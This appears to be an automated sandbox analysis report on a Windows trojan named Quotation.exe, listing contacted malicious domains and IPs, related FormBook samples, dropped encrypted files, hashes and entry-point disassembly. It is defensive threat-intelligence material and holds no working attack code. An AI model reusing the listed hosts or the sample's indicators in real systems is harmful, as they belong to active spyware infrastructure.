                                                                                                          http://www.matteicapital.online/Angel_Investors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1Spcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.3kw40881107247y.clickiEbayRsPzr.exe, 00000005.00000002.4155924526.0000000005912000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.Matteicapital.onlinepcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfpcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.onlinepcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://i1.cdn-image.com/__media__/js/min.js?v2.3pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		high

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    209.74.77.109
                                                                                                                    		www.gogawithme.liveUnited States
                                                                                                                    		31744MULTIBAND-NEWHOPEUSfalse
                                                                                                                    146.88.233.115
                                                                                                                    		smartcongress.netFrance
                                                                                                                    		53589PLANETHOSTER-8CAfalse
                                                                                                                    8.210.114.150
                                                                                                                    		www.llljjjiii.shopSingapore
                                                                                                                    		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                    104.21.58.90
                                                                                                                    		www.bser101pp.buzzUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    199.59.243.227
                                                                                                                    		www.acond-22-mvr.clickUnited States
                                                                                                                    		395082BODIS-NJUSfalse
                                                                                                                    208.91.197.27
                                                                                                                    		www.matteicapital.onlineVirgin Islands (BRITISH)
                                                                                                                    		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                    38.47.232.124
                                                                                                                    		70kdd.topUnited States
                                                                                                                    		174COGENT-174USfalse
                                                                                                                    172.67.192.207
                                                                                                                    		www.3kw40881107247y.clickUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    161.97.142.144
                                                                                                                    		www.54248711.xyzUnited States
                                                                                                                    		51167CONTABODEtrue
                                                                                                                    103.21.221.87
                                                                                                                    		rtpterbaruwaktu3.xyzunknown
                                                                                                                    		9905LINKNET-ID-APLinknetASNIDtrue
                                                                                                                    172.67.138.37
                                                                                                                    		www.questmatch.proUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    47.76.213.197
                                                                                                                    		www.ytsd88.topUnited States
                                                                                                                    		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                                                                    185.27.134.206
                                                                                                                    		www.canadavinreport.siteUnited Kingdom
                                                                                                                    		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                                                                    194.85.61.76
                                                                                                                    		www.mrpokrovskii.proRussian Federation
                                                                                                                    		48287RU-CENTERRUfalse
                                                                                                                    172.67.209.48
                                                                                                                    		www.ampsamkok88.shopUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1560309
                                                                                                                    Start date and time:2024-11-21 16:55:40 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 7m 23s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                    Number of analysed new started processes analysed:8
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:2
                                                                                                                    Technologies:
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:Quotation.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@16/15
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    • VT rate limit hit for: Quotation.exe

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    10:57:23API Interceptor11146818x Sleep call for process: pcaui.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    209.74.77.109payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.gogawithme.live/6gtt/
                                                                                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.dailyfuns.info/n9b0/
                                                                                                                    146.88.233.115payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.smartcongress.net/11t3/
                                                                                                                    8.210.114.150payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.llljjjiii.shop/rsvy/
                                                                                                                    104.21.58.90payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.bser101pp.buzz/crrp/
                                                                                                                    199.59.243.227payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.acond-22-mvr.click/w9z4/
                                                                                                                    DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.bcg.services/mxde/?KV=8xKxkpsUUE6O2YGNwLnJ/+WM1qqfoI8NOsOkZIrS/NSsfWu+QjWct9+gZKiyGOAYB5Pljgx8M21MT9QArezJJe5Vce6MQIBegnnKKN1EkLTSu1v+eqsUQ+w=&Wno=a0qDq
                                                                                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.bcg.services/xz45/
                                                                                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.dating-apps-az-dn5.xyz/pn0u/
                                                                                                                    need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.bcg.services/5onp/
                                                                                                                    Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.migraine-massages.pro/ym43/
                                                                                                                    http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                                    • ww88.inscrit.es/_tr
                                                                                                                    http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                                    • ww88.inscrit.es/_tr
                                                                                                                    BlgAsBdkiD.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.adsdomain-195.click/q3rc/
                                                                                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.migraine-massages.pro/ym43/

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    www.3kw40881107247y.clickpayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 172.67.192.207
                                                                                                                    www.ampsamkok88.shoppayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 172.67.209.48
                                                                                                                    www.54248711.xyzpayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 161.97.142.144
                                                                                                                    www.questmatch.propayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 104.21.62.184
                                                                                                                    SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    www.llljjjiii.shoppayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 8.210.114.150
                                                                                                                    www.gogawithme.livepayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 209.74.77.109
                                                                                                                    www.7261ltajbc.bondMandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 154.12.28.184
                                                                                                                    www.canadavinreport.sitepayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 185.27.134.206
                                                                                                                    Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 185.27.134.206
                                                                                                                    www.acond-22-mvr.clickpayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    CLOUDFLARENETUSinjector V2.4.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.219.199
                                                                                                                    injector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.43.198
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.66.38
                                                                                                                    payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 172.67.209.48
                                                                                                                    Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 104.21.41.74
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                    • 162.159.61.3
                                                                                                                    http://xmrminingproxy.comGet hashmaliciousUnknownBrowse
                                                                                                                    • 104.21.6.188
                                                                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.66.38
                                                                                                                    VMX.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.198.61
                                                                                                                    Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                                                    • 104.21.15.40
                                                                                                                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCpayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 8.210.114.150
                                                                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 47.244.139.234
                                                                                                                    Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                                                    • 8.210.144.166
                                                                                                                    Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                                                    • 8.210.144.166
                                                                                                                    cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                                                    • 8.210.144.166
                                                                                                                    cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                                                    • 8.210.144.166
                                                                                                                    mal.jsGet hashmaliciousUnknownBrowse
                                                                                                                    • 8.209.119.17
                                                                                                                    m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 47.242.96.185
                                                                                                                    DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                    • 47.254.140.255
                                                                                                                    PHA AL PO.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 47.52.221.8
                                                                                                                    PLANETHOSTER-8CApayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 146.88.233.115
                                                                                                                    https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                                                                    • 146.88.234.239
                                                                                                                    EVCPUSBND147124_MBL Check_revised.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 199.16.129.175
                                                                                                                    Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 85.236.153.44
                                                                                                                    Remittance advice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 199.16.129.175
                                                                                                                    https://serwer2464839.home.pl/imodzeb4Get hashmaliciousUnknownBrowse
                                                                                                                    • 146.88.233.222
                                                                                                                    3Lf408k9mg.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                                                                    • 146.88.232.72
                                                                                                                    https://gsdgroup.ca/Get hashmaliciousUnknownBrowse
                                                                                                                    • 199.16.129.142
                                                                                                                    http://amundsenscience.comGet hashmaliciousUnknownBrowse
                                                                                                                    • 199.59.247.234
                                                                                                                    Hospital_Inquiry_List_3892892921.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                    • 146.88.237.40
                                                                                                                    MULTIBAND-NEWHOPEUSpayments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 209.74.77.109
                                                                                                                    Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 209.74.77.108
                                                                                                                    http://mt6j71.p1keesoulharmony.com/Get hashmaliciousHTMLPhisher, EvilProxyBrowse
                                                                                                                    • 209.74.95.101
                                                                                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 209.74.77.108
                                                                                                                    RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 209.74.77.107
                                                                                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 209.74.77.109
                                                                                                                    https://hmjpvx0wn1.gaimensebb.shop/Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                    • 209.74.95.101
                                                                                                                    Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 209.74.64.58
                                                                                                                    dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 209.74.64.187
                                                                                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 209.74.64.58

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Users\user\AppData\Local\Temp\72Z53078

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\pcaui.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):114688
                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\autD8D5.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):288768
                                                                                                                    Entropy (8bit):7.994847236452791
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:6144:JseSGRW+iAkgzKiQWWW9oQEMjTpc3FvXwv5I3I5rRJIic3D:JseSGU+iqm5WGQS1vgvG4xR9iD
                                                                                                                    MD5:CC3B6A14C7B68CCCFAFCAB04B89A29E1
                                                                                                                    SHA1:9FA78D008443C7539C5D5B666351DE4A1EDA17CF
                                                                                                                    SHA-256:A5043E5BB7014021F6E70605B63ED504CFC8AE20F1CF939F02C8193D904EF9D0
                                                                                                                    SHA-512:72226B94E52C38423D7CE6317A1ED7511D316E079F1F43AB9DAF4BE0FF405BC1B168A178A7FB33C4B31BD7AD3DFF309BA23A8C8579B3B8EAE0BAAAA7A942797A
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:uo.HODAIK9WR..4J.HD85RHL.AIO9WR624J5HD85RHLDAIO9WR624J5HD85R.LDAGP.YR.;.k.I.... %7a9=V0 W_.)T&*WAr*)d3<!.><.v{..%+\P|EANeIO9WR62MK<.yXR.u,#.t/^.H...pU/."...p$&.U....RS.g!'P.2/.DAIO9WR6bqJ5.E95U..AIO9WR62.J7IO9>RH.@AIO9WR624.&HD8%RHL4EIO9.R6"4J5JD83RHLDAIO?WR624J5H4<5RJLDAIO9URv.4J%HD(5RHLTAI_9WR624Z5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR62.>P0085R..@AI_9WR`64J%HD85RHLDAIO9WR.24*5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR

                                                                                                                    C:\Users\user\AppData\Local\Temp\carryover

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):288768
                                                                                                                    Entropy (8bit):7.994847236452791
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:6144:JseSGRW+iAkgzKiQWWW9oQEMjTpc3FvXwv5I3I5rRJIic3D:JseSGU+iqm5WGQS1vgvG4xR9iD
                                                                                                                    MD5:CC3B6A14C7B68CCCFAFCAB04B89A29E1
                                                                                                                    SHA1:9FA78D008443C7539C5D5B666351DE4A1EDA17CF
                                                                                                                    SHA-256:A5043E5BB7014021F6E70605B63ED504CFC8AE20F1CF939F02C8193D904EF9D0
                                                                                                                    SHA-512:72226B94E52C38423D7CE6317A1ED7511D316E079F1F43AB9DAF4BE0FF405BC1B168A178A7FB33C4B31BD7AD3DFF309BA23A8C8579B3B8EAE0BAAAA7A942797A
                                                                                                                    Malicious:false
                                                                                                                    Preview:uo.HODAIK9WR..4J.HD85RHL.AIO9WR624J5HD85RHLDAIO9WR624J5HD85R.LDAGP.YR.;.k.I.... %7a9=V0 W_.)T&*WAr*)d3<!.><.v{..%+\P|EANeIO9WR62MK<.yXR.u,#.t/^.H...pU/."...p$&.U....RS.g!'P.2/.DAIO9WR6bqJ5.E95U..AIO9WR62.J7IO9>RH.@AIO9WR624.&HD8%RHL4EIO9.R6"4J5JD83RHLDAIO?WR624J5H4<5RJLDAIO9URv.4J%HD(5RHLTAI_9WR624Z5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR62.>P0085R..@AI_9WR`64J%HD85RHLDAIO9WR.24*5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.146285454327311
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:Quotation.exe
                                                                                                                    File size:1'213'440 bytes
                                                                                                                    MD5:c7d6d34ddd68d74c5a19706389c194b3
                                                                                                                    SHA1:3408f89d12a1d074e6e8d986358bc47004992634
                                                                                                                    SHA256:d427e886742374abc13d828803e196079832b38dc7d6d560ee0e2425612a3832
                                                                                                                    SHA512:874807d15551171bc7ecd00b3c0364d0765bc16ac2c7a90daf0c6e4b592a85f9eb9faf7febcbc3b53753569c9f8fbecaf191d76f0ef05178d42cb845f8e45928
                                                                                                                    SSDEEP:24576:btb20pkaCqT5TBWgNQ7apH1IicrWkxpdNGlwEaGz56A:YVg5tQ7apVIi2/xUl+c5
                                                                                                                    TLSH:6745CF1373DE8365C3B25273BA25B741AEBF782506B1F56B2FD4093DE920122521EA73
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                                                    File Icon

                                                                                                                    Icon Hash:aaf3e3e3938382a0

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x425f74
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x673ECB28 [Thu Nov 21 05:54:48 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:1
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:1
                                                                                                                    Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    call 00007F1B44D7947Fh
                                                                                                                    jmp 00007F1B44D6C494h
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [esp+10h]
                                                                                                                    mov ecx, dword ptr [esp+14h]
                                                                                                                    mov edi, dword ptr [esp+0Ch]
                                                                                                                    mov eax, ecx
                                                                                                                    mov edx, ecx
                                                                                                                    add eax, esi
                                                                                                                    cmp edi, esi
                                                                                                                    jbe 00007F1B44D6C61Ah
                                                                                                                    cmp edi, eax
                                                                                                                    jc 00007F1B44D6C97Eh
                                                                                                                    bt dword ptr [004C0158h], 01h
                                                                                                                    jnc 00007F1B44D6C619h
                                                                                                                    rep movsb
                                                                                                                    jmp 00007F1B44D6C92Ch
                                                                                                                    cmp ecx, 00000080h
                                                                                                                    jc 00007F1B44D6C7E4h
                                                                                                                    mov eax, edi
                                                                                                                    xor eax, esi
                                                                                                                    test eax, 0000000Fh
                                                                                                                    jne 00007F1B44D6C620h
                                                                                                                    bt dword ptr [004BA370h], 01h
                                                                                                                    jc 00007F1B44D6CAF0h
                                                                                                                    bt dword ptr [004C0158h], 00000000h
                                                                                                                    jnc 00007F1B44D6C7BDh
                                                                                                                    test edi, 00000003h
                                                                                                                    jne 00007F1B44D6C7CEh
                                                                                                                    test esi, 00000003h
                                                                                                                    jne 00007F1B44D6C7ADh
                                                                                                                    bt edi, 02h
                                                                                                                    jnc 00007F1B44D6C61Fh
                                                                                                                    mov eax, dword ptr [esi]
                                                                                                                    sub ecx, 04h
                                                                                                                    lea esi, dword ptr [esi+04h]
                                                                                                                    mov dword ptr [edi], eax
                                                                                                                    lea edi, dword ptr [edi+04h]
                                                                                                                    bt edi, 03h
                                                                                                                    jnc 00007F1B44D6C623h
                                                                                                                    movq xmm1, qword ptr [esi]
                                                                                                                    sub ecx, 08h
                                                                                                                    lea esi, dword ptr [esi+08h]
                                                                                                                    movq qword ptr [edi], xmm1
                                                                                                                    lea edi, dword ptr [edi+08h]
                                                                                                                    test esi, 00000007h
                                                                                                                    je 00007F1B44D6C675h
                                                                                                                    bt esi, 03h
                                                                                                                    jnc 00007F1B44D6C6C8h
                                                                                                                    movdqa xmm1, dqword ptr [esi+00h]

                                                                                                                    Rich Headers

                                                                                                                    Programming Language:
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                    • [ASM] VS2012 UPD4 build 61030
                                                                                                                    • [RES] VS2012 UPD4 build 61030
                                                                                                                    • [LNK] VS2012 UPD4 build 61030

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f3c4.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
